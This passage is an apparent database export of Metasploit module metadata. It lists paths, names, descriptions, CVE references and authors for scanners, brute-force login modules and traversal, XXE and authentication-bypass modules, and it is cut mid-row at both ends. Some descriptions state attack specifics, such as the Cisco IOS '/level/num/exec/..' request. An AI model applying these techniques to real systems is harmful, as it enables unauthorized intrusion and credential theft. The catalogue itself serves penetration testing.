[basilic_diff_exec]",300,"Identifies vulnerable versions of Basilic.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1403,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/cacti_graphimage_exec.rb","auxiliary","pro/webscan/cacti_graphimage_exec","auxiliary/pro/webscan/cacti_graphimage_exec","PRO: Cacti detection module ( < v0.8.6-d) [cacti_graphimage_exec]",300,"Identifies vulnerable versions of Cacti.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1404,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/coppermine_piceditor.rb","auxiliary","pro/webscan/coppermine_piceditor","auxiliary/pro/webscan/coppermine_piceditor","PRO: Coppermine Photo Gallery (<= 1.4.14) detection module [coppermine_piceditor]",300,"Identifies vulnerable versions of Coppermine Photo Gallery.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1405,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/credit_card_number.rb","auxiliary","pro/webscan/credit_card_number","auxiliary/pro/webscan/credit_card_number","PRO: Credit Card number detection module",300,"Identifies Credit Card number disclosures.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1406,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/csrf.rb","auxiliary","pro/webscan/csrf","auxiliary/pro/webscan/csrf","PRO: CSRF identification module",300,"Identifies business-logic-relevant forms without anti-CSRF tokens","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1407,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/http_put.rb","auxiliary","pro/webscan/http_put","auxiliary/pro/webscan/http_put","PRO: HTTP PUT module",300,"Identifies publicly writable server directories","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1408,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/joomla_tinybrowser.rb","auxiliary","pro/webscan/joomla_tinybrowser","auxiliary/pro/webscan/joomla_tinybrowser","PRO: Joomla! (v1.5) detection module",300,"Identifies installation of the Joomla! 
CMS.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1409,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/mybb_backdoor.rb","auxiliary","pro/webscan/mybb_backdoor","auxiliary/pro/webscan/mybb_backdoor","PRO: MyBB detection module",300,"Identifies installation of the MyBB forum.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1410,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/oscommerce_filemanager.rb","auxiliary","pro/webscan/oscommerce_filemanager","auxiliary/pro/webscan/oscommerce_filemanager","PRO: osCommerce (v2.2) detection module",300,"Identifies vulnerable versions of osCommerce.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1411,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/php_wordpress_lastpost.rb","auxiliary","pro/webscan/php_wordpress_lastpost","auxiliary/pro/webscan/php_wordpress_lastpost","PRO: Wordpress ( < v1.5.1.3) detection module",300,"Identifies vulnerable versions of Wordpress.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1412,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/php_xmlrpc_eval.rb","auxiliary","pro/webscan/php_xmlrpc_eval","auxiliary/pro/webscan/php_xmlrpc_eval","PRO: PHP XML-RPC detection module",300,"Identifies PHP XML-RPC servers.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1413,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/ssn.rb","auxiliary","pro/webscan/ssn","auxiliary/pro/webscan/ssn","PRO: Social Security Number detection module",300,"Identifies Social Security Number disclosures.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1414,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_graph_formula_exec.rb","auxiliary","pro/webscan/tikiwiki_graph_formula_exec","auxiliary/pro/webscan/tikiwiki_graph_formula_exec","PRO: TikiWiki (v1.9.8) detection module",300,"Identifies a vulnerable version 
of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1415,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_jhot_exec.rb","auxiliary","pro/webscan/tikiwiki_jhot_exec","auxiliary/pro/webscan/tikiwiki_jhot_exec","PRO: TikiWiki (v1.9.4) detection module",300,"Identifies a vulnerable version of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1416,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_unserialize_exec.rb","auxiliary","pro/webscan/tikiwiki_unserialize_exec","auxiliary/pro/webscan/tikiwiki_unserialize_exec","PRO: TikiWiki (v8.3) detection module",300,"Identifies a vulnerable version of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1417,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/unauthorized_access.rb","auxiliary","pro/webscan/unauthorized_access","auxiliary/pro/webscan/unauthorized_access","PRO: Unauthorized access module",300,"Identifies restricted resources which are accessible without authorization.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1418,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/websploit.rb","auxiliary","pro/websploit","auxiliary/pro/websploit","PRO: Web Exploitation",300,"Obtain data and remote access through vulnerable web applications","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1419,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/wizard/quick_pentest.rb","auxiliary","pro/wizard/quick_pentest","auxiliary/pro/wizard/quick_pentest","PRO: Quick Pentest Wizard Runner",300,"Command-and-control module for running all the submodules of a Quick Pentest wizard under one task.","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1420,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/wizard/web_app_test.rb","auxiliary","pro/wizard/web_app_test","auxiliary/pro/wizard/web_app_test","PRO: Web App Test 
Runner",300,"Command-and-control module for running all the submodulesof a Web App Test under one task.","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1421,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/afp/afp_login.rb","auxiliary","scanner/afp/afp_login","auxiliary/scanner/afp/afp_login","Apple Filing Protocol Login Utility",300,"This module attempts to bruteforce authentication credentials for AFP.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html, URL-https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html","Gregory Man " 1422,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/afp/afp_server_info.rb","auxiliary","scanner/afp/afp_server_info","auxiliary/scanner/afp/afp_server_info","Apple Filing Protocol Info Enumerator",300,"This module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html","Gregory Man " 1423,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb","auxiliary","scanner/backdoor/energizer_duo_detect","auxiliary/scanner/backdoor/energizer_duo_detect","Energizer DUO Trojan Scanner",300,"Detect instances of the Energizer DUO trojan horse software on port 7777","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0103, OSVDB-62782, US-CERT-VU-154421","hdm " 1424,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/couchdb/couchdb_enum.rb","auxiliary","scanner/couchdb/couchdb_enum","auxiliary/scanner/couchdb/couchdb_enum","CouchDB Enum 
Utility",300,"Send a ""send_request_cgi()"" to enumerate databases and your values on CouchDB (Without authentication by default)","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"espreto " 1425,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/db2_auth.rb","auxiliary","scanner/db2/db2_auth","auxiliary/scanner/db2/db2_auth","DB2 Authentication Brute Force Utility",300,"This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1426,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/db2_version.rb","auxiliary","scanner/db2/db2_version","auxiliary/scanner/db2/db2_version","DB2 Probe Utility",300,"This module queries a DB2 instance information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1427,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/discovery.rb","auxiliary","scanner/db2/discovery","auxiliary/scanner/db2/discovery","DB2 Discovery Service Detection",300,"This module simply queries the DB2 discovery service for information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1428,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb","auxiliary","scanner/dcerpc/endpoint_mapper","auxiliary/scanner/dcerpc/endpoint_mapper","Endpoint Mapper Service Discovery",300,"This module can be used to obtain information from the Endpoint Mapper service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1429,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/hidden.rb","auxiliary","scanner/dcerpc/hidden","auxiliary/scanner/dcerpc/hidden","Hidden DCERPC Service Discovery",300,"This module will query the endpoint mapper and make a 
list of all ncacn_tcp RPC services. It will then connect to each of these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1430,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/management.rb","auxiliary","scanner/dcerpc/management","auxiliary/scanner/dcerpc/management","Remote Management Interface Discovery",300,"This module can be used to obtain information from the Remote Management Interface DCERPC service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1431,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb","auxiliary","scanner/dcerpc/tcp_dcerpc_auditor","auxiliary/scanner/dcerpc/tcp_dcerpc_auditor","DCERPC TCP Service Auditor",300,"Determine what DCERPC services are accessible over a TCP port","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1432,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dect/call_scanner.rb","auxiliary","scanner/dect/call_scanner","auxiliary/scanner/dect/call_scanner","DECT Call Scanner",300,"This module scans for active DECT calls","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.dedected.org","DK " 1433,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dect/station_scanner.rb","auxiliary","scanner/dect/station_scanner","auxiliary/scanner/dect/station_scanner","DECT Base Station Scanner",300,"This module scans for DECT base stations","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.dedected.org","DK " 1434,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/arp_sweep.rb","auxiliary","scanner/discovery/arp_sweep","auxiliary/scanner/discovery/arp_sweep","ARP Sweep Local Network Discovery",300,"Enumerate alive Hosts in local network using ARP requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"belch" 1435,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb","auxiliary","scanner/discovery/ipv6_multicast_ping","auxiliary/scanner/discovery/ipv6_multicast_ping","IPv6 Link Local/Node Local Ping Discovery",300,"Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://wuntee.blogspot.com/2010/12/ipv6-ping-host-discovery-metasploit.html","wuntee" 1436,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb","auxiliary","scanner/discovery/ipv6_neighbor","auxiliary/scanner/discovery/ipv6_neighbor","IPv6 Local Neighbor Discovery",300,"Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local broadcast network.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"belch" 1437,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb","auxiliary","scanner/discovery/ipv6_neighbor_router_advertisement","auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement","IPv6 Local Neighbor Discovery Using Router Advertisement",300,"Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, and try to guess the link-local address by concatinating the prefix, and the host portion of the IPv6 address. 
Use NDP host solicitation to determine if the IP address is valid","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://wuntee.blogspot.com/2010/11/ipv6-link-local-host-discovery-concept.html","wuntee" 1438,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/udp_probe.rb","auxiliary","scanner/discovery/udp_probe","auxiliary/scanner/discovery/udp_probe","UDP Service Prober",300,"Detect common UDP services using sequential probes","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1439,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/udp_sweep.rb","auxiliary","scanner/discovery/udp_sweep","auxiliary/scanner/discovery/udp_sweep","UDP Service Sweeper",300,"Detect interesting UDP services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1440,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb","auxiliary","scanner/emc/alphastor_devicemanager","auxiliary/scanner/emc/alphastor_devicemanager","EMC AlphaStor Device Manager Service",300,"This module queries the remote host for the EMC Alphastor Device Management Service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1441,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb","auxiliary","scanner/emc/alphastor_librarymanager","auxiliary/scanner/emc/alphastor_librarymanager","EMC AlphaStor Library Manager Service",300,"This module queries the remote host for the EMC Alphastor Library Management Service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1442,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/finger/finger_users.rb","auxiliary","scanner/finger/finger_users","auxiliary/scanner/finger/finger_users","Finger Service User Enumerator",300,"Identify valid users through the finger service using a variety 
of tricks","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1443,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/anonymous.rb","auxiliary","scanner/ftp/anonymous","auxiliary/scanner/ftp/anonymous","Anonymous FTP Access Detection",300,"Detect anonymous (read/write) FTP server access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP","Matteo Cantoni " 1444,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/ftp_login.rb","auxiliary","scanner/ftp/ftp_login","auxiliary/scanner/ftp/ftp_login","FTP Authentication Scanner",300,"This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1445,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/ftp_version.rb","auxiliary","scanner/ftp/ftp_version","auxiliary/scanner/ftp/ftp_version","FTP Version Scanner",300,"Detect FTP Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1446,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb","auxiliary","scanner/ftp/titanftp_xcrc_traversal","auxiliary/scanner/ftp/titanftp_xcrc_traversal","Titan FTP XCRC Directory Traversal Information Disclosure",300,"This module exploits a directory traversal vulnreability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC ""brute force"" attack. 
Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory.","Metasploit Framework License (BSD)","f","2010-06-15 00:00:00",,,"aggressive","t","OSVDB-65533, URL-http://seclists.org/bugtraq/2010/Jun/160","Brandon McCann @zeknox , jduck " 1447,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/h323/h323_version.rb","auxiliary","scanner/h323/h323_version","auxiliary/scanner/h323/h323_version","H.323 Version Scanner",300,"Detect H.323 Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1448,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/adobe_xml_inject.rb","auxiliary","scanner/http/adobe_xml_inject","auxiliary/scanner/http/adobe_xml_inject","Adobe XML External Entity Injection",300,"Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-38197, CVE-2009-3960, OSVDB-62292, URL-http://www.adobe.com/support/security/bulletins/apsb10-05.html, URL-http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf","CG " 1449,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb","auxiliary","scanner/http/apache_activemq_source_disclosure","auxiliary/scanner/http/apache_activemq_source_disclosure","Apache ActiveMQ JSP files Source Disclosure",300,"This module exploits a source code disclosure in Apache ActiveMQ. The vulnerability is due to the Jetty's ResourceHandler handling of specially crafted URI's starting with //. 
It has been tested successfully on Apache ActiveMQ 5.3.1 over Windows 2003 SP2 and Ubuntu 10.04.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-39636, CVE-2010-1587, OSVDB-64020, URL-https://issues.apache.org/jira/browse/AMQ-2700","Veerendra G.G, juan vazquez " 1450,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_activemq_traversal.rb","auxiliary","scanner/http/apache_activemq_traversal","auxiliary/scanner/http/apache_activemq_traversal","Apache ActiveMQ Directory Traversal",300,"This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's ResourceHandler installed with the affected versions. This module has been tested successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-86401, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895, URL-https://issues.apache.org/jira/browse/amq-2788","AbdulAziz Hariri, juan vazquez " 1451,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_userdir_enum.rb","auxiliary","scanner/http/apache_userdir_enum","auxiliary/scanner/http/apache_userdir_enum","Apache ""mod_userdir"" User Enumeration",300,"Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-3335, CVE-2001-1013, OSVDB-637","Alligator Security Team, Heyder Andrade " 1452,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb","auxiliary","scanner/http/atlassian_crowd_fileaccess","auxiliary/scanner/http/atlassian_crowd_fileaccess","Atlassian Crowd XML Entity Expansion Remote File Access",300,"This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. This module has been tested successfully on Linux and Windows installations of Crowd.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-53595, CVE-2012-2926, OSVDB-82274, URL-https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17, URL-https://www.neg9.org","Thaddeus Bogner, Trevor Hartman, Will Caput, juan vazquez " 1453,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/axis_local_file_include.rb","auxiliary","scanner/http/axis_local_file_include","auxiliary/scanner/http/axis_local_file_include","Apache Axis2 v1.4.1 Local File Inclusion",300,"This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. 
By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-12721, OSVDB-59001","==[ Alligator Security Team ]==, Tiago Ferreira " 1454,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/axis_login.rb","auxiliary","scanner/http/axis_login","auxiliary/scanner/http/axis_login","Apache Axis2 v1.4.1 Brute Force Utility",300,"This module attempts to login to an Apache Axis2 v1.4.1 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0219, OSVDB-68662","==[ Alligator Security Team ]==, Leandro Oliveira " 1455,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/backup_file.rb","auxiliary","scanner/http/backup_file","auxiliary/scanner/http/backup_file","HTTP Backup File Scanner",300,"This module identifies the existence of possible copies of a specific file in a given path.","BSD License","f",,,,"aggressive","t",,"et " 1456,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb","auxiliary","scanner/http/barracuda_directory_traversal","auxiliary/scanner/http/barracuda_directory_traversal","Barracuda Multiple Product ""locale"" Directory Traversal",300,"This module exploits a directory traversal vulnerability present in several Barracuda products, including the Barracuda Spam and Virus Firewall, Barracuda SSL VPN, and the Barracuda Web Application Firewall. 
By default, this module will attempt to download the Barracuda configuration file.","Metasploit Framework License (BSD)","f","2010-10-08 00:00:00",,,"aggressive","t","EDB-15130, OSVDB-68301, URL-http://secunia.com/advisories/41609/","==[ Alligator Security Team ]==, Tiago Ferreira " 1457,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb","auxiliary","scanner/http/bitweaver_overlay_type_traversal","auxiliary/scanner/http/bitweaver_overlay_type_traversal","Bitweaver overlay_type Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Bitweaver. When handling the 'overlay_type' parameter, view_overlay.php fails to do any path checking/filtering, which can be abused to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-23 00:00:00",,,"aggressive","t","CVE-2012-5192, EDB-22216, OSVDB-86599, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt","David Aaron, Jonathan Claudius, sinn3r " 1458,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/blind_sql_query.rb","auxiliary","scanner/http/blind_sql_query","auxiliary/scanner/http/blind_sql_query","HTTP Blind SQL Injection Scanner",300,"This module identifies the existence of Blind SQL injection issues in GET/POST Query parameters values.","BSD License","f",,,,"aggressive","t",,"et " 1459,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/brute_dirs.rb","auxiliary","scanner/http/brute_dirs","auxiliary/scanner/http/brute_dirs","HTTP Directory Brute Force Scanner",300,"This module identifies the existence of interesting directories by brute forcing the name in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1460,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cert.rb","auxiliary","scanner/http/cert","auxiliary/scanner/http/cert","HTTP SSL 
Certificate Checker",300,"This module will check the certificate of the specified web servers to ensure the subject and issuer match the supplied pattern and that the certificate is not expired. Note: Be sure to check your expression if using msfcli, shells tend to not like certain things and will strip/interpret them (= is a perfect example). It is better to use in console.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nebulus" 1461,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_device_manager.rb","auxiliary","scanner/http/cisco_device_manager","auxiliary/scanner/http/cisco_device_manager","Cisco Device HTTP Device Manager Access",300,"This module gathers data from a Cisco device (router or switch) with the device manager web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication.","Metasploit Framework License (BSD)","f","2000-10-26 00:00:00",,,"aggressive","t","BID-1846, CVE-2000-0945, OSVDB-444","hdm " 1462,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb","auxiliary","scanner/http/cisco_ios_auth_bypass","auxiliary/scanner/http/cisco_ios_auth_bypass","Cisco IOS HTTP Unauthorized Administrative Access",300,"This module exploits a vulnerability in the Cisco IOS HTTP Server. By sending a GET request for ""/level/num/exec/.."", where num is between 16 and 99, it is possible to bypass authentication and obtain full system control. IOS 11.3 -> 12.2 are reportedly vulnerable. 
This module tested successfully against a Cisco 1600 Router IOS v11.3(11d).","Metasploit Framework License (BSD)","f","2001-06-27 00:00:00",,,"aggressive","t","BID-2936, CVE-2001-0537, OSVDB-578, URL-http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml","Patrick Webster , hdm " 1463,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb","auxiliary","scanner/http/cisco_nac_manager_traversal","auxiliary/scanner/http/cisco_nac_manager_traversal","Cisco Network Access Manager Directory Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerability is present in versions of Cisco Network Access Manager 4.8.x. You may wish to change FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-3305, OSVDB-76080, URL-http://dev.metasploit.com/redmine/issues/5673, URL-http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml","Nenad Stojanovski " 1464,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/clansphere_traversal.rb","auxiliary","scanner/http/clansphere_traversal","auxiliary/scanner/http/clansphere_traversal","ClanSphere 2011.3 Local File Inclusion Vulnerability",300,"This module exploits a directory traversal flaw found in Clansphere 2011.3. 
The application fails to handle the cs_lang parameter properly, which can be used to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-23 00:00:00",,,"aggressive","t","EDB-22181, OSVDB-86720","blkhtc0rp, sinn3r " 1465,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cold_fusion_version.rb","auxiliary","scanner/http/cold_fusion_version","auxiliary/scanner/http/cold_fusion_version","ColdFusion Version Scanner",300,"This module attempts to identify various flavors of ColdFusion up to version 10 as well as the underlying OS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nebulus, sinn3r " 1466,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb","auxiliary","scanner/http/coldfusion_locale_traversal","auxiliary/scanner/http/coldfusion_locale_traversal","ColdFusion Server Check",300,"This module attempts to exploit the directory traversal in the 'locale' attribute. According to the advisory the following versions are vulnerable: ColdFusion MX6 6.1 base patches, ColdFusion MX7 7,0,0,91690 base patches, ColdFusion MX8 8,0,1,195765 base patches, ColdFusion MX8 8,0,1,195765 with Hotfix4. Adobe released patches for ColdFusion 8.0, 8.0.1, and 9 but ColdFusion 9 is reported to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. 
